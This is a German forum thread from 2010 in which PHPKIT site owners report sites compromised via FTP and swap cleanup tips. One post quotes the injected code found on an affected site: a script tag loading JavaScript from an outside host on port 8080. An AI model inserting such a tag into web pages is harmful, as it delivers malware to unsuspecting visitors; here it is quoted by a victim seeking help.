Forum Partner+Friends LinkUs Downloads KNW Suche TS³ Viewer Twitter Facebook

Angriff auf versch. Webseiten (via FTP)

Jetzt kostenlos Anmelden!


"Sascha" Männlich

"HellBoY the KiT"

Beiträge: 492

Geschlecht: Männlich

Wohnort: 63263 Neu-Isenburg

PHPKIT Version: 1.6.5

81

Dienstag, 22. Juni 2010, 18:06

ftp und db wurden alle erneuert von den anderen seiten die ich kannte ist nichts nur BFM & LCL
  • Zum Seitenanfang
  • Zum Seitenende

Leiche

ist gerade angekommen

Beiträge: 5

PHPKIT Version: 1.6.5

82

Dienstag, 22. Juni 2010, 18:22

bei mir ist noch alles save, noch!
kit-power.de
  • Zum Seitenanfang
  • Zum Seitenende

tanga Weiblich

ist gerade angekommen

Beiträge: 2

Geschlecht: Weiblich

PHPKIT Version: 1.6.5

83

Dienstag, 22. Juni 2010, 18:42

:cursing: meine ist auch zum 2ten mal dran :cursing: :cursing: :cursing: ?( ?(
  • Zum Seitenanfang
  • Zum Seitenende

reddevil82 Männlich

BFM Stream Cheffe

Beiträge: 1 712

Geschlecht: Männlich

PHPKIT Version: 1.6.5

84

Dienstag, 22. Juni 2010, 18:44

Also PW wurden geändert.

Laut Telefonat eben mit all inkl. sagen die nun wiederum das der Trojaner über ein unsicheres Script ausgeführt wurde. Man ich werde langsam wahnsinnig das gibt es doch net
Seit 02.07.2010 Papa einer süssen Tocher !!!!

http://www.burnerfm.de

Mit den besten Hits der 80´s, 90´s und von heute. Plus einigen PHPKit Addons... uvm.
  • Zum Seitenanfang
  • Zum Seitenende

Knuddi Männlich

kennen Einige hier

Beiträge: 344

Geschlecht: Männlich

PHPKIT Version: 1.6.1

85

Dienstag, 22. Juni 2010, 18:45

Na das wird ja jetzt langsam richtig gruselig. NIcht das es doch irgendwo ein Schlupfloch gibt? Selbst die Seite von der Ilse Aigner wurde Ziel eines Angriffs siehe hier: http://winfuture.de/news,56274.html

Ist halt die Frage, obs jetzt nun an der php version liegt? von irgendwo müssen sie ja reinkommen. bei mir ist zum glück auch noch alles clean und ich hab die phpversion 4.
  • Zum Seitenanfang
  • Zum Seitenende

"Sascha" Männlich

"HellBoY the KiT"

Beiträge: 492

Geschlecht: Männlich

Wohnort: 63263 Neu-Isenburg

PHPKIT Version: 1.6.5

86

Dienstag, 22. Juni 2010, 20:46

So BFM ist wieder clean sollte noch was sein kurz bescheid geben Danke

es waren alle *.js Datein alle index.php auser pksm index dort war komischerweise nix drin und noch 5 oder 6 htm datein im admintpl Ordner.

Komisch komisch :huh:
  • Zum Seitenanfang
  • Zum Seitenende

reddevil82 Männlich

BFM Stream Cheffe

Beiträge: 1 712

Geschlecht: Männlich

PHPKIT Version: 1.6.5

87

Dienstag, 22. Juni 2010, 23:42

Eine kleine Lösung hab ich gefunden. Man kann die index.php mit CHMOD 0444 Rechte versehen dann passiert nix. Hab diesmal testweise gemacht und diese Datei blieb sauber.

Müsste das auch mit js und html gehen oder gibts dann Probleme beim Aufruf. Weiss das zufällig gerade jemand?
Seit 02.07.2010 Papa einer süssen Tocher !!!!

http://www.burnerfm.de

Mit den besten Hits der 80´s, 90´s und von heute. Plus einigen PHPKit Addons... uvm.
  • Zum Seitenanfang
  • Zum Seitenende

Dirk Kántor Männlich

aká Dooki

Beiträge: 2 073

Geschlecht: Männlich

PHPKIT Version: keine

88

Donnerstag, 24. Juni 2010, 18:19

will mir mal jemand, der all-inkl. space hat (oder sonst selber FTP Logs hat) seine logdatei schicken vom tag des angriffs?

wills mal auswerten :D 8)

ähm äh dooki@php-gfx.net ^^
:thumbsup:    :thumbsup:       *tc*       :thumbsup:    :thumbsup:
8o           Achtung: Dirk Kántor ist unterwegs!           8o
Er verteilt gerne Verwarnungen ohne vorher darüber diskutiert zu haben.
  • Zum Seitenanfang
  • Zum Seitenende

DJ Sebi Männlich

ist gerade angekommen

Beiträge: 7

Geschlecht: Männlich

Wohnort: Helmstedt

PHPKIT Version: 1.6.1

89

Samstag, 26. Juni 2010, 13:29

mich hats jetzt auch erwischt wir sind bei digital-webstream.de (Media4live)

kriege das problem aktuell nicht behoben,
ich hab das hier+

Zitat

<?php
die('Direct access to this location is not permitted.');
?>
<script type="text/javascript" src="http://topious.fairwaydrycleaners.net:8080/Vector_Graphic.js"></script>
<!--a3906c6f910402173832730bfe0f883a-->



Weiß denn einer woran es jetzt genau liegt?

am PHPKIT oder am Anbieter bzw. FTP
ClubNature.FM - The Sound of the Future ::: Online Radio
Dance, HandsUP, Trance, Jumpstyle, Techno & Hardstyle
  • Zum Seitenanfang
  • Zum Seitenende

Muetze Männlich

Ein Pazifist mit der Waffe in der Hand

Beiträge: 681

Geschlecht: Männlich

Wohnort: zu Hause

PHPKIT Version: 1.6.5

90

Samstag, 26. Juni 2010, 14:49

Das weiß noch keiner genau, aber eine Lösung, wie man den Code raus bekommt findest Du in Beitrag 6 & 43.
Es liegt aber auf jeden Fall nicht am PHPKIT, denn auch viele Seiten, die nicht PHPKIT nutzen betroffen waren & viele sogar noch sind.


MfG
Es geht nicht darum zu haben was man will, sondern zu schätzen was man hat!
Blutrausch HP
Mauern sind auch nur Steine & Wassertropen können auch mal Wassermengen werden!
  • Zum Seitenanfang
  • Zum Seitenende

Ähnliche Themen